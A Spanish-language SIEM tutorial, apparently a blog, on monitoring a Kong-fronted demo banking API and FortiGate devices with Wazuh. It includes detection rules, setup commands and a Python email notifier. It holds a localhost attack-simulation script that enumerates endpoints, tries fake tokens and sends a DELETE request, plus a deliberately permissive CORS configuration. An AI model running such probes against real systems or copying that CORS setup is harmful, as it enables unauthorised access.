  <rule id="100122" level="7">
    <if_sid>100100if_sid>
    <url>/banking/url>
    <id>^403$id>
    <description>Kong: Forbidden access attempt to banking API - $(protocol) $(url) from $(srcip)description>
    <group>kong,banking,authorization,forbiddengroup>
  rule>

  
  <rule id="100123" level="5">
    <if_sid>100100if_sid>
    <url>/banking/url>
    <id>^404$id>
    <description>Kong: Resource not found on banking API - $(protocol) $(url) from $(srcip)description>
    <group>kong,banking,not_foundgroup>
  rule>

  
  <rule id="100124" level="8" frequency="10" timeframe="120">
    <if_matched_sid>100123if_matched_sid>
    <same_source_ip />
    <description>Kong: Multiple 404 errors from $(srcip) - Possible endpoint enumeration attackdescription>
    <group>kong,banking,attack,enumerationgroup>
  rule>

  
  <rule id="100125" level="6">
    <if_sid>100100if_sid>
    <url>/banking/url>
    <id>^429$id>
    <description>Kong: Rate limit exceeded on banking API from $(srcip)description>
    <group>kong,banking,rate_limit,abusegroup>
  rule>

  
  
  

  
  <rule id="100130" level="3">
    <if_sid>100100if_sid>
    <id>^2\d\d$id>
    <description>Kong: Successful request - $(protocol) $(url) from $(srcip)description>
    <group>kong,successgroup>
  rule>

  
  <rule id="100131" level="5">
    <if_sid>100100if_sid>
    <id>^4\d\d$id>
    <description>Kong: Client error - $(protocol) $(url) - Status: $(id) from $(srcip)description>
    <group>kong,errorgroup>
  rule>

group>

Listo! Ya estamos para ejecutar.

docker-compose up -d

Vamos a pegarle una mirada a los contenedores.

Para que tengamos una idea de los puertos y contenedores, te los paso en limpio aquí.

Banking API

Es una API generada para este Prueba de Concepto con información ficticia. Pueden encontrar el código en el repositorio, pero a grandes rasgos nos data esta información:

Gestiona clientes (nombre, email, teléfono, fecha de registro).
Gestiona cuentas vinculadas a clientes (número, tipo, saldo, moneda).
Gestiona tarjetas de crédito asociadas a cuentas (número, límite, saldo usado, vencimiento). En las respuestas públicas el CVV se oculta.
Registra transacciones (depósitos, retiros, transferencias, compras).
Provee un resumen por cliente que agrega cuentas y tarjetas (totales de saldos y crédito disponible).
Incluye endpoints de salud y la documentación.

Kong

Voy a proporcionarles los comandos para que nuestro API Manager consuma la Banking API. Vamos paso a paso: primero, debemos crear un "Service" en Kong que represente tu API backend.

curl -i -X POST http://localhost:8001/services/ \
  --data "name=banking-api" \
  --data "url=http://banking-api:3000"

Creamos un "Route" que define cómo los clientes accederán a tu servicio. Vincula la ruta al servicio creado anteriormente.

curl -i -X POST http://localhost:8001/services/banking-api/routes \
  --data "name=banking-route" \
  --data "paths[]=/banking" \
  --data "strip_path=true"

Habilitamos CORS (Cross-Origin Resource Sharing) para permitir peticiones desde navegadores. Aca lo voy a crear de una forma permisiva.

curl -i -X POST http://localhost:8001/services/banking-api/plugins \
  --data "name=cors" \
  --data "config.origins=*" \
  --data "config.methods[]=GET" \
  --data "config.methods[]=HEAD" \
  --data "config.methods[]=PUT" \
  --data "config.methods[]=PATCH" \
  --data "config.methods[]=POST" \
  --data "config.methods[]=DELETE" \
  --data "config.methods[]=OPTIONS" \
  --data "config.headers[]=*" \
  --data "config.exposed_headers[]=*" \
  --data "config.credentials=true" \
  --data "config.max_age=3600"

Como saben, Kong es un API Manager. Podríamos habilitar varios plugins, pero para la PoC no son necesarios. Podrías habilitar Rate Limiting, Request Size Limiting, Correlation ID o Request Transformer. Vamos a probarlo.

# Vamos a ver los clientes
curl http://localhost:8000/banking/clientes | jq
# Cliente con ID 1
curl http://localhost:8000/banking/clientes/1 | jq

Konga

Todo lo que hicimos con curl, podemos hacerlo a través de la interfaz gráfica. Primero, vamos a crear nuestra cuenta en Konga y luego agregar la conexión para gestionar Kong.

Ahí se ve todo lo creado, anteriormente. Por ejemplo el servicio.

o la ruta.

Wazuh

Si todo salió bien, ingresamos a Wazuh para ver nuestras consultas. Para ver las reglas de Kong, aplique un filtro decoder.name: kong-decoder

N8N

Ya levantado el contenedor ingresamos a http://localhost:5678. Ahí armaremos dos workflows, uno para el análisis y otro para que los administradores puedan liberar la ip bloqueada.

Una vez que suframos el ataque, habrá lógica para decidir si debemos bloquear o no. Esto es una prueba, pero imagino consultas de diferentes API, Slack o servicios internos. Una vez que se ejecute el Workflow Block IP, deberíamos recibir un correo como este:

Al final del correo, podemos invocar el Workflow Release IP para liberar la dirección del atacante.

Simulacion de Ataque

Les dejo un script para simular un ataque rápidamente.

#!/bin/bash
# quick-test.sh - Prueba rpida

echo " Generando alertas de prueba..."

# Trfico normal
curl -s http://localhost:8000/banking/cuentas

# Mltiples 404 (activar regla de correlacin)
for i in {1..12}; do
    curl -s http://localhost:8000/banking/fake-endpoint-$i
    sleep 0.5
done

# Mltiples 401 (credential stuffing)
for i in {1..5}; do
    curl -s http://localhost:8000/banking/cuentas -H "Authorization: Bearer fake_$i"
    sleep 1
done

# DELETE peligroso
curl -s -X DELETE http://localhost:8000/banking/cuentas/123

echo " Alertas generadas. Revisa n8n y Wazuh!"

Espero que les sirva y puedan usarlo en sus empresas, si necesitan una mano me avisan.

Saludos, Santi.

Bonus Track

Dejo los Worflows de N8N para analizar con Ollama. Código.

Comandos Útiles

# 1. Reiniciar Wazuh Manager
docker-compose restart single-node-wazuh.manager-1

# 2. Verificar que está escuchando en el puerto 514
docker exec single-node-wazuh.manager-1 netstat -tlnp | grep 514

# 3. Revisar ossec.conf
docker exec single-node-wazuh.manager-1 cat /var/ossec/etc/ossec.conf

# 4. Ver logs de Integraciones
docker exec single-node-wazuh.manager-1 tail -f /var/ossec/logs/integrations.log

# 5. Ver logs de Alarmas de Kong
docker exec -it single-node-wazuh.manager-1 tail -f /var/ossec/logs/alerts/alerts.log | grep -A 10 "kong"

# 6. Ver logs de Wazuh Manager
docker logs -f single-node-wazuh.indexer-1

Referencias

https://ipv6.rs/tutorial/Ubuntu_Server_Latest/Kong/

https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html

La observabilidad como aliado, monitorizando y alertando Fortinet con Wazuh.

Santiago Fernandez — Sun, 05 Oct 2025 23:32:14 GMT

Introduccion

Hace un tiempo escribí sobre Wazuh y recibí muchas consultas. Voy a avanzar un poco más y vamos a monitorear un equipo Fortigate para tener alarmas en tiempo real y actuar en consecuencia. La verdad es que este SIEM nos ofrece una gran variedad de opciones para configurar. En este caso en particular, vamos a crear dos tipos de reglas personalizadas, una para las IPs y otra para las conexiones VPN. Queremos que cuando se ejecute una regla, nos envíe un correo. Claro que puedes modificarlo para que envíe un mensaje a Slack o Teams. Y por qué no llevarlo a un N8N, algo en lo que estoy trabajando.

La idea es tener esta clase de alarmas. Dejo estos ejemplos, uno de IPs con un ataque de DoS y uno de VPN con un usuario fuera de horario laboral.

Prerequisitos

Necesitamos tener instalado un Wazuh Server. En mi caso, uso la versión 4.12. Debemos modificar el archivo ossec.conf para que reciba eventos UDP en el puerto 514. De esta manera, podemos dirigir nuestros dispositivos Fortinet a nuestro SIEM para enviar los Syslogs.

# La Ruta es /var/ossec/etc/ossec.conf
  
  <remote>
    syslog
    514
    udp
    any
  remote>

Luego, como en cada cambio en el Wazuh Manager.

sudo systemctl restart wazuh-manager

Ya nos deberian llegar los Logs de Fortigate, si configuraste bien el equipo. Aca ten dejo un instructivo, para ello.

Configurar Decoders

Un decoder es el componente encargado de interpretar y extraer información de los logs en bruto que recibe Wazuh. Piensa en él como un traductor que convierte texto plano en datos estructurados que Wazuh puede analizar y sobre los cuales puede crear reglas de detección. Para que tengas una idea te dejo la lista de los que son mantenido por la comunidad.

En nuestro caso vamos a generar una lista propia, creandola aqui /var/ossec/etc/decoders/custom-fortigate-ips.xml



<decoder name="fortigate-ips">
  <prematch>type=ipsprematch>
decoder>

<decoder name="fortigate-ips-details">
  <parent>fortigate-ipsparent>
  <regex>severity=(\w+)regex>
  <order>severityorder>
decoder>

<decoder name="fortigate-ips-details">
  <parent>fortigate-ipsparent>
  <regex>srcip=(\S+)regex>
  <order>srciporder>
decoder>

<decoder name="fortigate-ips-details">
  <parent>fortigate-ipsparent>
  <regex>dstip=(\S+)regex>
  <order>dstiporder>
decoder>

<decoder name="fortigate-ips-details">
  <parent>fortigate-ipsparent>
  <regex>dstport=(\d+)regex>
  <order>dstportorder>
decoder>

<decoder name="fortigate-ips-details">
  <parent>fortigate-ipsparent>
  <regex>attack="([^"]+)"regex>
  <order>attackorder>
decoder>

<decoder name="fortigate-ips-details">
  <parent>fortigate-ipsparent>
  <regex>action=(\w+)regex>
  <order>actionorder>
decoder>

Configurando las Reglas

Una regla es el componente que analiza los datos extraídos por los decoders y determina si un evento es relevante, cuán crítico es, y qué acciones tomar. Las reglas transforman datos en alertas de seguridad. Una explicacion burda seria la siguiente: Se envia el log para que el decoder extraiga los campos, la regla evalua y clasifican para saber si debe o no generar la alerta.

Vamos a crear dos reglas, custom, para fortigate. Ambas deben estar en este path /var/ossec/etc/rules.




<group name="fortigate,ids,ips,utm,">

  

  <rule id="196200" level="3">
    <if_sid>81629if_sid>
    <description>Fortigate IPS event detecteddescription>
    <group>fortigate,fortigate_ipsgroup>
  rule>

 

  
  <rule id="196201" level="13">
    <if_sid>196200if_sid>
    <field name="severity">criticalfield>
    <description>FGT IPS: CRITICAL attack detected - $(attack) from $(srcip)description>
    <options>no_full_logoptions>
    <mitre>
      <id>T1190id>
    mitre>
    <group>attack,critical,fortigate_ipsgroup>
  rule>

  
  <rule id="196202" level="10">
    <if_sid>196200if_sid>
    <field name="severity">highfield>
    <description>FGT IPS: HIGH severity attack - $(attack) from $(srcip)description>
    <options>no_full_logoptions>
    <mitre>
      <id>T1190id>
    mitre>
    <group>attack,high,fortigate_ipsgroup>
  rule>

  
  <rule id="196203" level="7">
    <if_sid>196200if_sid>
    <field name="severity">mediumfield>
    <description>FGT IPS: MEDIUM severity attack - $(attack) from $(srcip)description>
    <options>no_full_logoptions>
    <group>attack,medium,fortigate_ipsgroup>
  rule>

  
  <rule id="196204" level="5" frequency="10" timeframe="300">
    <if_matched_sid>196200if_matched_sid>
    <field name="severity">lowfield>
    <same_source_ip />
    <description>FGT IPS: Multiple LOW severity attacks from same IP (10+ in 5min)description>
    <group>attack,low,fortigate_ips_repeatedgroup>
  rule>

  

  
  <rule id="196205" level="5">
    <if_sid>196200if_sid>
    <match>action="dropped"match>
    <description>FGT IPS: Attack BLOCKED from $(srcip) - $(attack)description>
    <options>no_full_logoptions>
    <group>attack,blocked,fortigate_ipsgroup>
  rule>

  
  <rule id="196206" level="9">
    <if_sid>196200if_sid>
    <match>action="detected"match>
    <description>FGT IPS: Attack DETECTED but NOT blocked - $(attack) from $(srcip)description>
    <options>no_full_logoptions>
    <mitre>
      <id>T1190id>
    mitre>
    <group>attack,detected,fortigate_ips_unblockedgroup>
  rule>

  
  <rule id="196207" level="14">
    <if_sid>196200if_sid>
    <field name="severity">criticalfield>
    <match>action="detected"match>
    <description>FGT IPS: CRITICAL attack NOT BLOCKED - $(attack) from $(srcip) to $(dstip)description>
    <mitre>
      <id>T1190id>
    mitre>
    <group>attack,critical,fortigate_ips_unblocked,emergencygroup>
  rule>

  

  
  <rule id="196208" level="11">
    <if_sid>196200if_sid>
    <match>SQL|sql_injection|SQLimatch>
    <description>FGT IPS: SQL Injection attempt from $(srcip) to $(dstip):$(dstport)description>
    <mitre>
      <id>T1190id>
      <id>T1505.003id>
    mitre>
    <group>attack,sql_injection,web,fortigate_ipsgroup>
  rule>

  
  <rule id="196209" level="10">
    <if_sid>196200if_sid>
    <match>XSS|Cross.Site|cross-sitematch>
    <description>FGT IPS: XSS attack attempt from $(srcip) to $(dstip)description>
    <mitre>
      <id>T1189id>
    mitre>
    <group>attack,xss,web,fortigate_ipsgroup>
  rule>

  
  <rule id="196210" level="11">
    <if_sid>196200if_sid>
    <match>command.injection|Command.Executionmatch>
    <description>FGT IPS: Command Injection attempt from $(srcip)description>
    <mitre>
      <id>T1059id>
    mitre>
    <group>attack,command_injection,fortigate_ipsgroup>
  rule>

  
  <rule id="196211" level="9">
    <if_sid>196200if_sid>
    <match>Directory.Traversal|Path.Traversalmatch>
    <description>FGT IPS: Path Traversal attempt from $(srcip)description>
    <mitre>
      <id>T1083id>
    mitre>
    <group>attack,path_traversal,web,fortigate_ipsgroup>
  rule>

  

  
  <rule id="196212" level="12">
    <if_sid>196200if_sid>
    <match>Buffer.Overflow|buffer-overflowmatch>
    <description>FGT IPS: Buffer Overflow exploit attempt from $(srcip)description>
    <mitre>
      <id>T1203id>
    mitre>
    <group>attack,buffer_overflow,exploit,fortigate_ipsgroup>
  rule>

  
  <rule id="196213" level="13">
    <if_sid>196200if_sid>
    <match>Remote.Code|RCE|code.executionmatch>
    <description>FGT IPS: Remote Code Execution attempt from $(srcip)description>
    <mitre>
      <id>T1203id>
      <id>T1059id>
    mitre>
    <group>attack,rce,exploit,fortigate_ips,criticalgroup>
  rule>

  

  
  <rule id="196214" level="7">
    <if_sid>196200if_sid>
    <match>Nmap|nmap|Network.Mappermatch>
    <description>FGT IPS: Nmap scan detected from $(srcip)description>
    <mitre>
      <id>T1046id>
    mitre>
    <group>attack,reconnaissance,scan,fortigate_ipsgroup>
  rule>

  
  <rule id="196215" level="7" frequency="5" timeframe="60">
    <if_matched_sid>196200if_matched_sid>
    <same_source_ip />
    <match>Port.Scan|port.scanningmatch>
    <description>FGT IPS: Port scanning activity from $(srcip) (5+ in 1min)description>
    <mitre>
      <id>T1046id>
    mitre>
    <group>attack,reconnaissance,port_scan,fortigate_ipsgroup>
  rule>

  
  <rule id="196216" level="8">
    <if_sid>196200if_sid>
    <match>Vulnerability.Scanner|Nikto|OpenVAS|Nessusmatch>
    <description>FGT IPS: Vulnerability scanner detected from $(srcip)description>
    <mitre>
      <id>T1595id>
    mitre>
    <group>attack,reconnaissance,vuln_scan,fortigate_ipsgroup>
  rule>

  

  
  <rule id="196217" level="11">
    <if_sid>196200if_sid>
    <match>DoS|Denial.of.Servicematch>
    <description>FGT IPS: DoS attack detected from $(srcip) to $(dstip)description>
    <mitre>
      <id>T1498id>
    mitre>
    <group>attack,dos,fortigate_ipsgroup>
  rule>

  
  <rule id="196218" level="13">
    <if_sid>196200if_sid>
    <match>DDoS|Distributed.Denialmatch>
    <description>FGT IPS: DDoS attack detected targeting $(dstip)description>
    <mitre>
      <id>T1498id>
    mitre>
    <group>attack,ddos,fortigate_ips,criticalgroup>
  rule>

  
  <rule id="196219" level="10">
    <if_sid>196200if_sid>
    <match>SYN.Flood|syn-floodmatch>
    <description>FGT IPS: SYN Flood attack from $(srcip)description>
    <mitre>
      <id>T1498.001id>
    mitre>
    <group>attack,dos,syn_flood,fortigate_ipsgroup>
  rule>

  

  
  <rule id="196220" level="12">
    <if_sid>196200if_sid>
    <match>Malware|malicious|trojan|virus|wormmatch>
    <description>FGT IPS: Malware detected from $(srcip) - $(attack)description>
    <mitre>
      <id>T1204id>
    mitre>
    <group>attack,malware,fortigate_ips,criticalgroup>
  rule>

  
  <rule id="196221" level="11">
    <if_sid>196200if_sid>
    <match>Exploit|exploit-kit|CVE-match>
    <description>FGT IPS: Exploit attempt detected - $(attack) from $(srcip)description>
    <mitre>
      <id>T1203id>
    mitre>
    <group>attack,exploit,fortigate_ipsgroup>
  rule>

  
  <rule id="196222" level="14">
    <if_sid>196200if_sid>
    <match>Ransomware|ransom|crypto-lockermatch>
    <description>FGT IPS: Ransomware activity detected from $(srcip)description>
    <mitre>
      <id>T1486id>
    mitre>
    <group>attack,ransomware,malware,fortigate_ips,emergencygroup>
  rule>

  

  
  <rule id="196223" level="10">
    <if_sid>196200if_sid>
    <match>Apache|Nginx|HTTP.Servermatch>
    <description>FGT IPS: Web server exploit attempt - $(attack)description>
    <mitre>
      <id>T1190id>
    mitre>
    <group>attack,web,apache,fortigate_ipsgroup>
  rule>

  
  <rule id="196224" level="9">
    <if_sid>196200if_sid>
    <match>WordPress|wp-admin|wp-loginmatch>
    <description>FGT IPS: WordPress attack from $(srcip)description>
    <mitre>
      <id>T1190id>
    mitre>
    <group>attack,web,wordpress,fortigate_ipsgroup>
  rule>

  
  <rule id="196225" level="10">
    <if_sid>196200if_sid>
    <match>PHP|php-cgimatch>
    <description>FGT IPS: PHP exploit attempt from $(srcip)description>
    <mitre>
      <id>T1190id>
    mitre>
    <group>attack,web,php,fortigate_ipsgroup>
  rule>

  

  
  <rule id="196226" level="12" frequency="5" timeframe="120">
    <if_matched_sid>196200if_matched_sid>
    <same_source_ip />
    <description>FGT IPS: Multiple attacks from same IP $(srcip) (5+ in 2min)description>
    <mitre>
      <id>T1595id>
    mitre>
    <group>attack,correlated,fortigate_ips_repeatedgroup>
  rule>

  
  <rule id="196227" level="11" frequency="10" timeframe="300">
    <if_matched_sid>196200if_matched_sid>
    <same_source_ip />
    <not_same_field>data.dstipnot_same_field>
    <description>FGT IPS: Single IP attacking multiple targets (10+ targets in 5min)description>
    <mitre>
      <id>T1595id>
    mitre>
    <group>attack,correlated,fortigate_ips_spraygroup>
  rule>

  
  <rule id="196228" level="14" frequency="3" timeframe="60">
    <if_matched_sid>196201if_matched_sid>
    <same_source_ip />
    <description>FGT IPS: Multiple CRITICAL attacks in short time from $(srcip)description>
    <mitre>
      <id>T1190id>
    mitre>
    <group>attack,critical,fortigate_ips_burst,emergencygroup>
  rule>

  

  
  <rule id="196229" level="10">
    <if_sid>196200if_sid>
    <match>srccountry="China"|srccountry="Russia"|srccountry="Iran"|srccountry="North Korea"match>
    <description>FGT IPS: Attack from restricted country - $(attack)description>
    <mitre>
      <id>T1190id>
    mitre>
    <group>attack,geo_restricted,fortigate_ipsgroup>
  rule>

  

  
  <rule id="196230" level="10">
    <if_sid>196200if_sid>
    <match>dstport=3389match>
    <description>FGT IPS: Attack targeting RDP port (3389) from $(srcip)description>
    <mitre>
      <id>T1021.001id>
    mitre>
    <group>attack,rdp,fortigate_ipsgroup>
  rule>

  
  <rule id="196231" level="9">
    <if_sid>196200if_sid>
    <match>dstport=22match>
    <description>FGT IPS: Attack targeting SSH port (22) from $(srcip)description>
    <mitre>
      <id>T1021.004id>
    mitre>
    <group>attack,ssh,fortigate_ipsgroup>
  rule>

group>

Y el de VPN.

<group name="fortigate,custom,bruteforce,">

  

  
  <rule id="196100" level="12" frequency="6" timeframe="300" ignore="300">
    <if_matched_sid>81606if_matched_sid>
    <same_source_ip />
    <description>FGT: ADMIN bruteforce from same IP (6+ attempts in 5min)description>
    <mitre>
      <id>T1110.001id>
    mitre>
    <group>fortigate_admin_bruteforce,criticalgroup>
  rule>

  
  <rule id="196101" level="12" frequency="10" timeframe="180" ignore="300">
    <if_matched_sid>81614if_matched_sid>
    <same_source_ip />
    <description>FGT: SSL VPN bruteforce from same IP (10+ attempts in 3min)description>
    <mitre>
      <id>T1110.001id>
      <id>T1133id>
    mitre>
    <group>fortigate_vpn_bruteforce,criticalgroup>
  rule>

  

  
  <rule id="196102" level="5" ignore="60">
    <if_sid>81622if_sid>
    <time>7:00 pm - 6:00 amtime>
    <weekday>monday,tuesday,wednesday,thursday,fridayweekday>
    <description>FGT: VPN connection outside business hours (19:00-06:00) - $(user)description>
    <mitre>
      <id>T1078id>
      <id>T1133id>
    mitre>
    <group>fortigate_vpn_after_hoursgroup>
  rule>

  
  <rule id="196104" level="8" ignore="60">
    <if_sid>196102if_sid>
    <list field="user" lookup="match_key">etc/lists/vpn-monitored-userslist>
    <description>FGT VPN: Usuario monitoreado $(user) conectado fuera de horario laboraldescription>
    <mitre>
      <id>T1078id>
      <id>T1133id>
    mitre>
    <group>fortigate_vpn_suspicious,after_hours,monitored_usergroup>
  rule>

  

  
  <rule id="196103" level="5" ignore="60">
    <if_sid>81622if_sid>
    <weekday>saturday,sundayweekday>
    <description>FGT: VPN connection during weekend - $(user)description>
    <mitre>
      <id>T1078id>
      <id>T1133id>
    mitre>
    <group>fortigate_vpn_weekendgroup>
  rule>

  
  <rule id="196105" level="7" ignore="60">
    <if_sid>196103if_sid>
    <list field="user" lookup="match_key">etc/lists/vpn-monitored-userslist>
    <description>FGT VPN: Usuario monitoreado $(user) conectado en fin de semanadescription>
    <mitre>
      <id>T1078id>
      <id>T1133id>
    mitre>
    <group>fortigate_vpn_weekend,monitored_usergroup>
  rule>

  
  <rule id="196104" level="11" frequency="3" timeframe="3600" ignore="300">
    <if_matched_sid>81622if_matched_sid>
    <same_user />
    <not_same_source_ip />
    <description>FGT: VPN user connecting from multiple IPs (possible account compromise)description>
    <mitre>
      <id>T1078id>
      <id>T1090id>
    mitre>
    <group>fortigate_vpn_multiple_ips,criticalgroup>
  rule>

  
  <rule id="196112" level="11">
    <if_sid>81622if_sid>
    <match>srccountry="China"|srccountry="Russia"|srccountry="Iran"|srccountry="North Korea"match>
    <description>FGT: VPN connection from restricted country (BLOCKED)description>
    <mitre>
      <id>T1133id>
    mitre>
    <group>fortigate_geo_blocked,criticalgroup>
  rule>

  
  <rule id="196113" level="12">
    <if_sid>81605if_sid>
    <user>^admin$user>
    <time>6:00 pm - 8:00 amtime>
    <description>FGT: Admin account login outside business hoursdescription>
    <mitre>
      <id>T1078.003id>
    mitre>
    <group>fortigate_admin_after_hours,criticalgroup>
  rule>

group>

💡

En las reglas de VPN de horario y Fin de Semana, utilizo una lista con usuarios a revisar para que solo me avise lo importante. La lista esta en etc/lists/vpn-monitored-users.

Perfecto, ya tenemos las listas. Como les dije antes, vamos a reinciar Wazuh Manager para saber si tenemos problemas de sintaxis.

sudo systemctl restart wazuh-manager

Tambien podes usar el siguiente comando.

sudo apt-get install libxml2-utils    
xmllint --noout /var/ossec/etc/ossec.conf

Integracion con Email

Para que nos lleguen esos bellos correos vamos a crear un script en Python que sera referenciado en el ossec.conf.

{
  "smtp_host": "HOST",
  "smtp_port": 587,
  "use_tls": true,
  "username": "wazuh",
  "password": "TUPASSWORD",
  "from": "Wazuh SIEM ",
  "to": [
    "alertas_wazuh@TUDOMINIO",
    "sfernandez@TUDOMINIO"
  ],
  "subject_prefix": "[Wazuh SIEM]",
  "insecure_skip_verify": true,
  "geoip_db": "/usr/share/GeoIP/dbip-city-lite.mmdb" # Geo
}

Hay que instalar la GeoLocalizacion si desean. Si no eliminarlo.

Le damos los permisos.

sudo chown root:wazuh /var/ossec/etc/email-config.json
sudo chmod 640 /var/ossec/etc/email-config.json

Ahora vamos a crear el Python que hara la magia en la ruta /var/ossec/integrations. Yo lo voy a llamar custom-email.

#!/usr/bin/env python3
"""
Wazuh Unified Email Notifier v4.0
- Maneja Active Directory (reglas 100080-100085 y 60107-60113)
- Maneja FortiGate VPN/Admin (reglas 196100-196113)
- Maneja FortiGate IPS (reglas 196200-196231)
- Template HTML unificado y profesional
- GeoIP integrado
- Logging mejorado
- Configuración centralizada
"""

import sys, json, smtplib, ssl, pathlib, html, logging, re, os
from datetime import datetime
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.header import Header
from typing import Dict, Any, Tuple, Optional

# GeoIP opcional
try:
    import geoip2.database
    HAS_GEOIP = True
except ImportError:
    HAS_GEOIP = False

class UnifiedEmailNotifier:
    def __init__(self, config_path: str):
        self.config = self._load_config(config_path)
        self._setup_logging()

        # Grupos privilegiados de AD
        self.privileged_groups = {
            "Domain Admins", "Enterprise Admins", "Administrators", "Schema Admins",
            "Account Operators", "Server Operators", "Backup Operators", "Print Operators",
            "DnsAdmins", "Domain Controllers", "Enterprise Key Admins", "Key Admins",
            "Cert Publishers", "Group Policy Creator Owners", "RAS and IAS Servers"
        }

        # Países de alto riesgo (ajustar según política organizacional)
        self.high_risk_countries = {
            'China', 'Russia', 'North Korea', 'Iran', 'Vietnam', 'Nigeria',
            'Romania', 'Ukraine', 'Belarus', 'Myanmar', 'Pakistan'
        }

    def _setup_logging(self):
        """Configurar logging con rotación"""
        log_file = self.config.get("log_file", "/var/ossec/logs/integrations.log")

        handlers = [logging.StreamHandler(sys.stderr)]
        if log_file and os.path.dirname(log_file):
            try:
                os.makedirs(os.path.dirname(log_file), exist_ok=True)
                file_handler = logging.FileHandler(log_file)
                file_handler.setFormatter(logging.Formatter(
                    "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
                ))
                handlers.append(file_handler)
            except Exception:
                pass

        logging.basicConfig(
            level=getattr(logging, self.config.get("log_level", "INFO").upper()),
            format="%(asctime)s - %(levelname)s - %(message)s",
            handlers=handlers
        )
        self.logger = logging.getLogger("unified-email-notifier")

    def _load_config(self, config_path: str) -> Dict[str, Any]:
        """Cargar configuración con validación"""
        try:
            cfg = json.loads(pathlib.Path(config_path).read_text(encoding="utf-8"))

            required_fields = ["smtp_host", "to"]
            for field in required_fields:
                if field not in cfg:
                    raise ValueError(f"Campo requerido '{field}' faltante en configuración")

            cfg.setdefault("smtp_port", 587)
            cfg.setdefault("use_tls", True)
            cfg.setdefault("from", "wazuh@localhost")
            cfg.setdefault("subject_prefix", "[Wazuh SIEM]")
            cfg.setdefault("timeout", 30)
            cfg.setdefault("log_level", "INFO")

            return cfg
        except Exception as e:
            raise RuntimeError(f"Error cargando configuración {config_path}: {e}")

    def _load_alert(self, file_path: str) -> Dict[str, Any]:
        """Cargar alerta de Wazuh con manejo robusto de errores"""
        try:
            if not pathlib.Path(file_path).exists():
                raise FileNotFoundError(f"Archivo de alerta no encontrado: {file_path}")

            raw = pathlib.Path(file_path).read_text(encoding="utf-8", errors="ignore").strip()
            if not raw:
                raise ValueError("Archivo de alerta vacío")

            candidates = []
            if raw.startswith("{"):
                candidates.append(raw)
            else:
                for line in raw.splitlines():
                    line = line.strip()
                    if line.startswith("{") and line.endswith("}"):
                        candidates.append(line)

            for candidate in reversed(candidates):
                try:
                    return json.loads(candidate)
                except json.JSONDecodeError:
                    continue

            raise ValueError("No se encontró JSON válido en el archivo de alerta")

        except Exception as e:
            raise RuntimeError(f"Error cargando alerta {file_path}: {e}")

    def _get_field(self, data: Dict[str, Any], *paths: str, default: str = "-") -> str:
        """Buscar campo en múltiples rutas con tolerancia a casos"""
        for path in paths:
            current = data
            found = True

            for key in path.split("."):
                if not isinstance(current, dict):
                    found = False
                    break

                possible_keys = [key, key.lower(), key.capitalize(), key.upper()]
                matched_key = None

                for possible_key in possible_keys:
                    if possible_key in current:
                        matched_key = possible_key
                        break

                if matched_key is None:
                    found = False
                    break

                current = current[matched_key]

            if found and current is not None:
                return str(current).strip()

        return default

    def _format_timestamp(self, ts: str) -> str:
        """Formatear timestamp de manera consistente"""
        if not ts or ts == "-":
            return "-"

        try:
            if "T" in ts:
                if ts.endswith("Z"):
                    dt = datetime.fromisoformat(ts.replace("Z", "+00:00"))
                else:
                    dt = datetime.fromisoformat(ts)
                return dt.strftime("%d/%m/%Y %H:%M:%S")
            else:
                for fmt in ["%Y-%m-%d %H:%M:%S", "%d/%m/%Y %H:%M:%S"]:
                    try:
                        dt = datetime.strptime(ts, fmt)
                        return dt.strftime("%d/%m/%Y %H:%M:%S")
                    except ValueError:
                        continue
        except Exception:
            pass

        return ts

    def _create_badge(self, text: str, style: str = "default") -> str:
        """Crear badges HTML con estilos predefinidos"""
        styles = {
            "default": {"bg": "#f1f5f9", "fg": "#334155", "border": "#e2e8f0"},
            "success": {"bg": "#dcfce7", "fg": "#166534", "border": "#bbf7d0"},
            "warning": {"bg": "#fef3c7", "fg": "#92400e", "border": "#fde68a"},
            "danger": {"bg": "#fee2e2", "fg": "#7f1d1d", "border": "#fecaca"},
            "info": {"bg": "#dbeafe", "fg": "#1e40af", "border": "#93c5fd"},
            "critical": {"bg": "#7f1d1d", "fg": "#ffffff", "border": "#991b1b"},
            "geo": {"bg": "#ecfeff", "fg": "#0c4a6e", "border": "#7dd3fc"},
            "geo-risk": {"bg": "#fee2e2", "fg": "#7f1d1d", "border": "#fca5a5"}
        }

        style_config = styles.get(style, styles["default"])

        return (f"]};color:{style_config['fg']};"
                f"border:1px solid {style_config['border']};"
                f"font:bold 11px/14px Segoe UI,Roboto,Arial,sans-serif;"
                f"text-transform:uppercase;letter-spacing:0.5px;white-space:nowrap;'>"
                f"{html.escape(str(text))}")

    def _get_country_flag(self, iso_code: str) -> str:
        """Convertir código ISO a emoji de bandera"""
        if not iso_code or len(iso_code) != 2:
            return ""
        try:
            return "".join(chr(0x1F1E6 + ord(char) - 65) for char in iso_code.upper())
        except Exception:
            return ""

    def _get_geoip_info(self, ip: str) -> Dict[str, Any]:
        """Obtener información GeoIP con múltiples bases de datos"""
        if not ip or not HAS_GEOIP:
            return {}

        db_paths = [
            self.config.get("geoip_db", ""),
            "/var/ossec/etc/GeoIP/GeoLite2-City.mmdb",
            "/var/ossec/etc/GeoLite2-City.mmdb",
            "/usr/share/GeoIP/GeoLite2-City.mmdb",
            "/usr/share/GeoIP/dbip-city-lite.mmdb",
            "/opt/geoip/GeoLite2-City.mmdb"
        ]

        for db_path in db_paths:
            if not db_path or not pathlib.Path(db_path).exists():
                continue

            try:
                with geoip2.database.Reader(db_path) as reader:
                    response = reader.city(ip)
                    return {
                        "country": response.country.name or "",
                        "iso": response.country.iso_code or "",
                        "city": response.city.name or "",
                        "latitude": response.location.latitude,
                        "longitude": response.location.longitude
                    }
            except Exception as e:
                self.logger.debug(f"Error con base GeoIP {db_path}: {e}")
                continue

        return {}

    def _detect_alert_type(self, alert: Dict[str, Any]) -> str:
        """Detectar tipo de alerta basándose en rule_id y contenido"""
        rule_id = self._get_field(alert, "rule.id")

        # Reglas de Active Directory
        ad_rules = {"100080", "100081", "100082", "100083", "100084", "100085",
                   "60107", "60108", "60109", "60113"}

        # Reglas de FortiGate VPN/Admin
        fgt_vpn_rules = {"196100", "196101", "196102", "196103", "196104", "196105", 
                         "196106", "196112", "196113"}

        # Reglas de FortiGate IPS (196200-196231)
        fgt_ips_rules = set(str(x) for x in range(196200, 196232))

        if rule_id in ad_rules:
            return "active_directory"
        elif rule_id in fgt_vpn_rules:
            return "fortigate_vpn"
